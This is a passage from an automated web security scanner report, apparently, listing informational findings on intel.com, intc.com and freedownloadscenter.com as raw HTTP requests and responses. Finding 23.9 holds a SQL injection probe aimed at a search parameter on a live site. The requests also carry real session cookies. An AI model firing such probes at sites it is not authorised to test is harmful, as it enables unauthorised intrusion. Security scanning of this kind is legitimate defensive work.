Date: Sat, 05 Feb 2011 23:12:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
cache-control: private
pragma: no-cache
Content-Length: 187
Content-Type: text/html
Expires: Thu, 03 Feb 2011 23:12:18 GMT
Set-Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD; path=/
Cache-control: No-Store

clearTimeout(onsTimerB);function ONS_CoreSite(){ONS_sCookie(cn,'sid=9968985447329M1296947538033&stage=13',3,ch);ONS_showInvite();}onsUSID='9968985447329M1296947538033';ONS_initCore(true);

23.6. http://search.intel.com/TypeAheadDataFrame.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.intel.com
Path:   /TypeAheadDataFrame.htm

Request

GET /TypeAheadDataFrame.htm HTTP/1.1
Host: search.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/?en_US_01
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:12:07 GMT
Server: Microsoft-IIS/6.0
P: S4
X-Powered-By: ASP.NET
ETag: "0aa9af192b9cb1:7dc2"
Last-Modified: Fri, 21 Jan 2011 17:45:08 GMT
Content-Type: text/html
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 2415

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title></title>
...[SNIP]...

23.7. http://www.freedownloadscenter.com/Search/function.file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /Search/function.file

Request

GET /Search/function.file HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: Apache/2.2.3 (CentOS)
Date: Sun, 06 Feb 2011 01:51:24 GMT
Content-Type: text/html
Content-Length: 573
Connection: close

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.7.65</center>
</bod
...[SNIP]...

23.8. http://www.freedownloadscenter.com/Search/function.join  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /Search/function.join

Request

GET /Search/function.join HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: Apache/2.2.3 (CentOS)
Date: Sun, 06 Feb 2011 01:51:24 GMT
Content-Type: text/html
Content-Length: 573
Connection: close

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.7.65</center>
</bod
...[SNIP]...

23.9. http://www.freedownloadscenter.com/Search/newsearch.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /Search/newsearch.php3

Request

GET /Search/newsearch.php3?Category=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&Go=Go!&S_S=3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.freedownloadscenter.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:23:15 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 647
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: file(http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3?q=3&amp;Category=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR
...[SNIP]...

23.10. http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /mybeta/Search/newsearch.php3

Request

GET /mybeta/Search/newsearch.php3 HTTP/1.1
Host: www.freedownloadscenter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: Apache/2.2.3 (CentOS)
Date: Sun, 06 Feb 2011 01:51:26 GMT
Content-Type: text/html
Content-Length: 573
Connection: close

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.7.65</center>
</bod
...[SNIP]...

23.11. http://www.intc.com/common/download/download.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /common/download/download.cfm

Request

GET /common/download/download.cfm?companyid=INTC&fileid=435133&filekey=ca2f8f41-2f9e-460e-8bae-20fd6415ab85&filename=Earnings Release plus Tables Q4'10.pdf HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:15:58 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

23.12. http://www.intc.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /releasedetail.cfm

Request

GET /releasedetail.cfm?ReleaseID=546454&ReleasesType=Financial News HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:14:58 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

23.13. http://www.intc.com/sites/sitewide/hat/40recode  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intc.com
Path:   /sites/sitewide/hat/40recode

Request

GET /sites/sitewide/hat/40recode HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 404 Not Found
Content-Length: 6268
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:15:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<html lang="en-US">
<head>
<title>Page Not Found</title>

<link rel="shortcut icon"
...[SNIP]...

23.14. http://www.intel.com/business/enterprise/emea/deu/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/deu/index.htm

Request

GET /business/enterprise/emea/deu/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "1b25d468e03acb1:4305"
Last-Modified: Fri, 13 Aug 2010 12:09:41 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:03 GMT
Content-Length: 90
Connection: close

<meta http-equiv="Refresh" content="0; url=http://www.intel.com/de_De/business/index.htm">

23.15. http://www.intel.com/business/enterprise/emea/eng/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/eng/index.htm

Request

GET /business/enterprise/emea/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "60ee4e29e933cb1:440d"
Last-Modified: Wed, 04 Aug 2010 15:24:42 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:04 GMT
Content-Length: 90
Connection: close

<META HTTP-EQUIV="REFRESH" Content="0; URL=http://www.intel.com/en_uk/business/index.htm">

23.16. http://www.intel.com/business/enterprise/emea/fra/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/fra/index.htm

Request

GET /business/enterprise/emea/fra/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "e8fb4c2df3acb1:440d"
Last-Modified: Fri, 13 Aug 2010 12:05:02 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:04 GMT
Content-Length: 90
Connection: close

<meta http-equiv="Refresh" content="0; url=http://www.intel.com/fr_fr/business/index.htm">

23.17. http://www.intel.com/business/enterprise/emea/ita/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/ita/index.htm

Request

GET /business/enterprise/emea/ita/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "56706231845cb1:440d"
Last-Modified: Thu, 26 Aug 2010 12:12:54 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:04 GMT
Content-Length: 90
Connection: close

<meta http-equiv="Refresh" content="0; url=http://www.intel.com/it_it/business/index.htm">

23.18. http://www.intel.com/business/enterprise/emea/nld/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/nld/index.htm

Request

GET /business/enterprise/emea/nld/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "5dc5fd5ca5bcb1:440d"
Last-Modified: Fri, 24 Sep 2010 09:28:23 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:04 GMT
Content-Length: 72
Connection: close

<meta content="0; url=/nl_nl/business/index.htm" http-equiv="Refresh" >

23.19. http://www.intel.com/business/enterprise/emea/pol/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/pol/index.htm

Request

GET /business/enterprise/emea/pol/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "c91818f61745cb1:4305"
Last-Modified: Thu, 26 Aug 2010 12:12:32 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:05 GMT
Content-Length: 90
Connection: close

<meta http-equiv="Refresh" content="0; url=http://www.intel.com/pl_pl/business/index.htm">

23.20. http://www.intel.com/business/enterprise/emea/rus/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /business/enterprise/emea/rus/index.htm

Request

GET /business/enterprise/emea/rus/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; 